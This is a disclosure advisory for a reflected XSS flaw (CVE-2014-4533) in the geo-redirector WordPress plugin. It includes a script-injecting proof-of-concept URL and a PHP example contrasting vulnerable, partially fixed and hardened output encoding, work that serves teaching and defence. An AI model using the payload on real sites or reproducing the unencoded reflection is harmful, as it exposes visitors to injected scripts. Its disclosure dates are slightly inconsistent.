wp-plugin : geo-redirector

Plugin Details
Plugin Name: wp-plugin : geo-redirector
Affected Version : 1.0.1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/georedirector/ajax_functions.php?hid_id=hid_id%27%3E%3Cscript%3Ealert%282%29%3C/script%3E
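
The PoC value begins with an encoded single quote and >, so it only works if hid_id is reflected unencoded inside a quoted attribute. The following is an added example, not the plugin's code: the hidden-input markup and all function names are assumptions, and it shows that reflection beside an incomplete and a complete output-encoding fix.

```php
<?php
// Added example: a hypothetical reconstruction, NOT the plugin's source code.
// Assumption: the endpoint reflects hid_id inside a single-quoted attribute.

// The PoC query string from this advisory; parse_str() URL-decodes it
// the same way PHP populates $_GET.
parse_str('hid_id=hid_id%27%3E%3Cscript%3Ealert%282%29%3C/script%3E', $params);
$hid_id = $params['hid_id'];

// "Before": raw reflection. The decoded ' ends the attribute value and
// the > ends the tag, so the rest of the parameter is parsed as markup.
function render_vulnerable(string $v): string
{
    return "<input type='hidden' name='hid_id' value='" . $v . "'>";
}

// Incomplete fix: ENT_COMPAT (the default before PHP 8.1) encodes < > & "
// but leaves ' alone, so the value can still close a single-quoted attribute.
function render_partial(string $v): string
{
    $safe = htmlspecialchars($v, ENT_COMPAT, 'UTF-8');
    return "<input type='hidden' name='hid_id' value='" . $safe . "'>";
}

// Hardened: ENT_QUOTES also encodes ' so the value stays inside the attribute.
// Inside WordPress, esc_attr() is the equivalent call.
function render_hardened(string $v): string
{
    $safe = htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
    return "<input type='hidden' name='hid_id' value='" . $safe . "'>";
}

// Defence in depth: reject anything that is not a plain identifier.
// Assumption: hid_id only ever needs letters, digits, "_" and "-".
function is_valid_hid_id(string $v): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $v) === 1;
}

echo "vulnerable: ", render_vulnerable($hid_id), PHP_EOL;
echo "partial:    ", render_partial($hid_id), PHP_EOL;
echo "hardened:   ", render_hardened($hid_id), PHP_EOL;
echo "valid id?   ", var_export(is_valid_hid_id($hid_id), true), PHP_EOL;
```

Run with the PHP CLI and compare the three rendered lines: only the hardened one keeps the whole parameter inside the value attribute.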


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4533
Plugin Description :
[ This is a WordPress plugin; this plugin will allow you to redirect your URLs according to the visitor's geographical location. And you can manage redirect the visitor given radius inside or outside. This plugin was developed by AnushkaKR. ]